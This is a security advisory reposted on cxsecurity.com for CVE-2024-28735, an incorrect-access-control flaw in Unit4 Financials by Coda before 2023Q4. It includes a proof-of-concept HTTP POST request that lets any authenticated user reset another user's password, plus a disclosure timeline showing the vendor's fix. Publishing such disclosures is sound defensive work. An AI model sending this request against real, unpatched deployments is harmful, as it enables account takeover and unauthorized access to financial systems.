Financials By Coda Authorization Bypass

2024.03.16
Credit: Leo Draghi
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Vulnerability type: Incorrect Access Control # Vendor: https://www.unit4.com/ # Product: Financials by Coda # Product site: https://www.unit4.com/fr/products/financial-management-software # Affected version: < 2023Q4 # Fixed version: 2023Q4 # Credit: Léo DRAGHI # CVE: CVE-2024-28735 # PROOF OF CONCEPT The "Change Password" feature can be abused in order to modify the password of any user of the application. The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target. POST /coda/rest/session/password HTTP/2 Host: <target> <snip> { "user" : "<targeted_user>", "password" : "<attacker_user_password>", "company" : "<company>", "newPassword" : "<new_password_for_targeted_user", "tzOffset" :240 } # TIMELINE – 30/10/2023: Vulnerability found – 02/11/2023: Vendor informed – 05/12/2023: Vendor fixed the issue – 14/03/2024: Public disclosure


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top